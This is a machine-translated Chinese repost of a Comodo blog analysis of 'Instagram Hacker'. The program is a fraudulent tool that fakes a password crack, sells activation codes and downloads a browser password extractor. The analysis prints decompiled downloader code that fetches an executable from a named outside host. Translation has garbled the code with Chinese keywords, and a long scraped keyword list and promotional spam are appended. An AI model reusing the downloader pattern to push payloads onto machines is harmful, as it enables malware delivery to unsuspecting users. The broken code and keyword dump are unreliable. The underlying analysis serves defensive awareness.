阅读时间: 4 分钟
许多人不会将潜在有害应用程序(PUA)视为严重危险。 这种鲁re的态度的原因是,PUA通常是在用户同意的情况下安装的。 但是这种意见是一个很大的错误。 不仅是因为PUA可以在逐个下载的基础上秘密安装其他程序,例如广告软件或间谍软件。 生动的例子 下面由Comodo Threat Research Labs分析 专家清楚地表明,PUA可能是更具威胁性的武器。
认识名为“ Instagram Hacker”的软件。 它有官方网站 https://hackinstagram.net/ 并承诺…入侵任何Instagram帐户。 除此之外,您可以免费下载并安装它。
安装后,它会提示您输入Instagram个人资料URL并破解密码。
结果在几秒钟内到来:
但是单击“查看密码”按钮后,会出现一个新窗口:
单击“获取激活码”按钮重定向到“购买页面”。
它提供购买“激活码”的功能,但是……您能闻到空气中的欺诈吗? 显然,不存在能够几秒钟破解Instagram密码的软件。 那么,Instagram Hacker只是另一个欺骗简单元素的欺骗工具吗? 最好的检查方法是查看应用程序代码。
该代码受Dotnet Reactor保护,但可以使用de4dot工具进行解码。
现在我们可以确定该应用程序是欺诈工具。 代码的第一个片段只是伪造了进度演示指示器。
但是另一个更有趣。 如您所见,如果激活成功,它包含一个URL,该URL带有可执行文件以供下载。
LoadingWindow()
{
Class2.qDiUy7EzyuIMj();
this.filename =“ view.exe”;
this.uri =新的Uri(“ http://software-logistics.net/external/component/download/view.exe”);
this.InitializeComponent();
如果(File.Exists(this.filename))
{
File.Delete(this.filename);
}
尝试
{
WebClient client1 = new WebClient();
client1.DownloadFileAsync(this.uri,this.filename);
client1.DownloadProgressChanged + =新的DownloadProgressChangedEventHandler(this.method_1);
client1.DownloadFileCompleted + =新的AsyncCompletedEventHandler(this.method_2);
}
捕捉
{
this.method_0();
}
}
}
}
如果运行可执行文件,我们将发现它是NirSoft的WebBrowserPassView应用程序:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView只是一个密码提取工具,它可以显示Web浏览器存储的密码。 因此,该软件可以提取的所有密码不是Instagram的,而是用户自己的密码保存在浏览器中!
让我们继续:Instagram黑客所做的就是从NirSoft下载并启动另一个PUA。 因此,我们显然面临着欺诈工具。 请注意此处的操纵性心理技巧:如果受害者发现自己受骗,则几乎不会向警方报告此事。 因为在那种情况下,她必须承认试图入侵Instagram,这是犯下网络犯罪的行为。
但这是边缘的薄弱环节。
最危险的威胁是,应用程序中的URL可以轻易在恶意程序上更改,而恶意文件将在受害者的计算机上执行。 因此,该PUA以及此类恶意软件类型的许多其他示例可以用于大量扩散各种“重”恶意软件,例如特洛伊木马,后门, 勒索 等等
这是将PUA视为真正危险的恶意软件的充分理由。 因为它可能成为大规模破坏性网络攻击的跳板。
“今天我们不应该考虑 恶意软件 是危险还是不太危险,” Comodo威胁研究实验室负责人Fatih Orhan说。 “任何 恶意软件 在孤立的空间中不存在。 如今,网络犯罪分子建立了很长的恶意软件链来攻击用户,并且,正如您所看到的,PUA可以成为这种查杀链中的链接。 所以我们应该称锹为锹。 是的,这些应用程序已下载并在获得用户批准的情况下运行,但在这种情况下,这种批准是通过欺诈手段来勒索的。 在整个可能不需要的应用程序中,它们假装都是合法的,每个人都需要了解它只是伪装。 因此,Comodo不仅提供高端技术保护,而且会定期通知用户以防止他们陷入网络空间的危险陷阱。”
Comodo安全地生活!
相关资源
维基百科DDOS攻击
恶意软件删除
网站恶意软件扫描程序
最佳网站安全
WordPress的安全
- SEO 支持的内容和 PR 分发。 今天得到放大。
- 柏拉图区块链。 Web3 元宇宙智能。 知识放大。 访问这里。
- Sumber: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- Able
- 关于
- 账号管理
- 法案
- 活化
- 后
- 加拿大航空
- 所有类型
- 和
- 另一个
- 应用领域
- 应用领域
- 批准
- 攻击
- 态度
- 后门程序
- 基础
- 因为
- 最佳
- 大
- 博客
- 午休
- 浏览器
- 建立
- 按键
- 购买
- 呼叫
- 案件
- 链
- 链
- 查
- 明确地
- 码
- 提交
- 同意
- 考虑
- 包含
- 网络攻击
- 网络犯罪
- 网络罪犯
- 危险
- 危险的
- DDoS攻击
- 破坏性的
- 发现
- 别
- 翻番
- 下载
- 容易
- 边缘
- 输入
- 等
- 活动
- 例子
- 例子
- 专家
- 提取
- 面部彩妆
- 少数
- 文件
- 找到最适合您的地方
- 姓氏:
- 骗局
- Free
- 止
- 得到
- 非常好
- 更大的
- 破解
- 黑客
- 头
- 此处
- 创新中心
- How To
- HTML
- HTTPS
- in
- 事件
- 指示符
- 安装
- 即食类
- 有趣
- 孤立
- IT
- 实验室
- 发射
- 友情链接
- 长
- 看
- 机
- 恶意软件
- 恶意软件攻击
- 许多
- 大规模
- 最大宽度
- 错误
- 更多
- 最先进的
- 命名
- 需要
- 全新
- 明显
- 优惠精选
- 官方
- 官方网站
- 一
- 检讨
- 其他名称
- 己
- 密码
- 密码
- 员工
- PHP
- 柏拉图
- 柏拉图数据智能
- 柏拉图数据
- Police
- 可能
- 防止
- 本人简介
- 训练课程
- 进展
- 承诺
- 保护
- 保护
- 提供
- 实现
- 原因
- 鲁莽
- 经常
- 业务报告
- 研究
- 导致
- 简历
- 揭示
- 摆脱
- 运行
- 记分卡
- 秒
- 安全
- 保安
- 严重
- 应该
- So
- 软件
- 太空
- 间谍
- 存储
- 成功
- 这样
- 采取
- 文案
- 其
- 威胁
- 始终
- 次
- 至
- 工具
- 陷阱
- 转
- 理解
- 无用
- 网址
- 用户
- 用户
- 平时
- 各个
- 受害者
- 查看
- 卷筒纸
- 网页浏览器
- 您的网站
- 将
- 将
- 完全
- 您一站式解决方案
- 和风网